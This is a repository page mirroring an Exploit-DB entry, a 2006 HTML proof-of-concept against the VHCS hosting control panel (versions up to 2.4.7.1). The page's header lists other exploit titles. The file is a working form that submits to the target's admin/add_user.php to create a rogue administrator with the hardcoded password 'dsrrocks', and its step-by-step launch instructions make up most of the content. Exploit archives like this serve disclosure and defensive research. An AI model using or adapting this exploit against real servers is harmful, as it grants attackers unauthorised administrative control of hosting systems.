bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/1524.htm
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

90 lines
2.9 KiB
HTML
Executable file
Raw Blame History

<html>
<head>
<title>VHCS (version <= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit, script-kiddie!');
exit();
}
document.admin_add_user.action=document.admin_add_user.target.value;
document.admin_add_user.submit();
}
</script>
</head>
<body>
<hr>
<center>
<b>VHCS (version <= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt &#60roman&#64rs-labs.com&#62 &nbsp;[08.Feb.2006]</b>
</center>
<hr>
<form name="admin_add_user" method="post" action="">
<table width="100%" cellpadding="5" cellspacing="5">
<tr>
<td width="20">&nbsp;</td>
<td colspan="2">
&nbsp;
</td>
</tr>
<tr>
<td width="20">&nbsp;</td> <td width="200">Target URL</td>
<td>
<input type="text" name="target" value="http://<target>/vhcs2/admin/add_user.php" style="width:400px">
</td>
</tr>
<tr>
<td width="20">&nbsp;</td> <td width="200">Username</td>
<td>
<input type="text" name="username" value="admin" style="width:200px">&nbsp;(should NOT exist)
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan="2"><a href="javascript: submitform()">Exploit it!</a></td>
</tr>
<tr>
<td colspan="3">&nbsp;
</td>
</tr>
</table>
<input type="hidden" name="pass" value="dsrrocks">
<input type="hidden" name="pass_rep" value="dsrrocks">
<input type="hidden" name="email" value="vhcs-exploit@rs-labs.com">
<input type="hidden" name="uaction" value="add_user">
</form>
<hr>
<br>
<u>Quick instructions</u>.-<br>
<br>
1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.<br>
2.- Remember not to use a probably existing username (such as "admin").<br>
3.- Launch the exploit. <i>If target system is vulnerable, a new VHCS admin user will be created</i> ;-)<br>
4.- You will be redirected to VHCS login page. Try to login with your brand new username.<br>
5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br>
<br>
<u>More info (analysis, fix, etc)</u>.-<br>
<br>
See <a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i></a>.<br>
<br>
<hr>
</body>
</html>
# milw0rm.com [2006-02-23]
Reference in a new issue View git blame Copy permalink